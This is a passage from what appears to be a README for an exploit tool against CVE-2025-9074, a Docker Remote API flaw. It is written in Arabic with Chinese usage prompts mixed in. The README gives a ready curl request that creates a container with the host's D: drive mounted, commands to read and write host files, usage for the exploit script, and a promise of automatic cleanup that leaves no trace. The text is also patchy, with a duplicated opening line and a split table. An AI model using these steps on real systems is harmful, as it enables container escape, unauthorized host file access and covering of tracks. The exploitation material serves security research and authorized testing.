
أداة قوية لاستغلال ثغرات Docker Remote API، مخصصة للبحث والاختبار الأمني لثغرة CVE-2025-9074.
أداة قوية لاستغلال ثغرات Docker Remote API، مصممة للبحث والاختبار الأمني لثغرة CVE-2025-9074.
✅ إدارة دورة حياة الحاويات تلقائيًا بالكامل: إنشاء حاويات مؤقتة تلقائيًا، وتنظيفها تلقائيًا بعد اكتمال العملية دون ترك أي أثر
✅ معالجة ذكية للمسارات: التعرف تلقائيًا على مسارات Windows وتحويلها إلى صيغة تثبيت Docker
✅ إجراءات تشغيل آلية بالكامل: دون الحاجة إلى إدخال أوامر معقدة يدويًا، تفاعل قائم على القوائم، وإتمام عمليات الملفات بضغطة واحدة
✅ توافق عبر المنصات: دعم كامل لأنظمة Windows و Linux
عمليات الحاويات
إدارة الصور
عمليات ملفات النظام المضيف
CVE-2025-9074 هي ثغرة أمنية في Docker Remote API، يمكن للمهاجم من خلال الوصول غير المصرح به إلى Docker API:
استخدم requirements.txt لتثبيت جميع التبعيات:
pip install -r requirements.txt
أو التثبيت اليدوي:
pip install requests docker websocket-client
شغّل البرنامج النصي مباشرة باستخدام عنوان Docker API الافتراضي:
python CVE-2025-9074-docker-exploit.py
python CVE-2025-9074-docker-exploit.py -u http://192.168.1.100:2375
python CVE-2025-9074-docker-exploit.py [选项]
选项:
-u, --url URL Docker API 地址(默认: http://192.168.65.7:2375)
1. 上传文件到宿主机
请输入本地文件路径: /path/to/local/file.txt
请输入宿主机目标目录: D:/temp
请输入目标文件名 (留空则使用原文件名):
2. 从宿主机下载文件
请输入宿主机文件路径: D:/temp/file.txt
请输入本地保存路径: /tmp
3. 读取宿主机文件内容
请输入宿主机文件路径: D:/temp/file.txt
4. 向宿主机写入文件
请输入宿主机目标目录: D:/temp
请输入文件内容: Hello, World!
تقوم هذه الأداة تلقائيًا بمعالجة تعيين مسارات Windows Docker Desktop:
| مسار Windows |
|---|
صيغ الإدخال المدعومة:
D:\ أو D:/D:\temp أو D:/temp"D:\file.txt" (مع علامات اقتباس)'D:/file.txt' (مع علامات اقتباس)⚠️ تنبيه مهم:
إنشاء حاوية عبر Docker API وتثبيت قرص النظام المضيف:
curl -X POST "http://<target>:2375/containers/create" \
-H "Content-Type: application/json" \
-d '{
"Image": "python:3.11.7",
"Cmd": ["sleep", "999d"],
"HostConfig": {
"Binds": ["/mnt/host/d:/tmp"]
},
"Tty": true
}'
قراءة وكتابة ملفات النظام المضيف عبر تنفيذ أوامر داخل الحاوية:
# 写入文件
echo "content" > /tmp/file.txt
# 读取文件
cat /tmp/file.txt
pip install docker websocket-clientpython CVE-2025-9074-docker-exploit.py
CVE-2025-9074-docker-exploit.py
├── 容器管理函数
│ ├── get_containers()
│ ├── display_containers()
│ ├── create_container()
│ ├── stop_container()
│ └── delete_container()
├── 镜像管理函数
│ ├── get_images()
│ ├── display_images()
│ ├── pull_image()
│ └── remove_image()
├── 宿主机文件操作函数
│ ├── upload_file_to_host()
│ ├── download_file_from_host()
│ ├── read_file_from_host()
│ └── write_file_to_host()
└── 工具函数
├── normalize_host_path()
├── create_container_with_mount()
├── start_container()
└── stop_and_remove_container()
نرحب بتقديم Issues و Pull Requests!
هذا المشروع مخصص للاستخدام التعليمي والبحث الأمني فقط.
هذه الأداة مخصصة فقط للاختبارات الأمنية المصرح بها والأغراض التعليمية. يتحمل المستخدم كامل المسؤولية والمخاطر الناتجة عن استخدام هذه الأداة. لا يتحمل المؤلف أي مسؤولية عن أي إساءة استخدام أو استخدام غير مصرح به لهذه الأداة.
| مسار تثبيت Docker |
|---|
D:\ | /mnt/host/d |
D:\temp | /mnt/host/d/temp |
C:\Windows | /mnt/host/c/Windows |
C:\Users\test | /mnt/host/c/Users/test |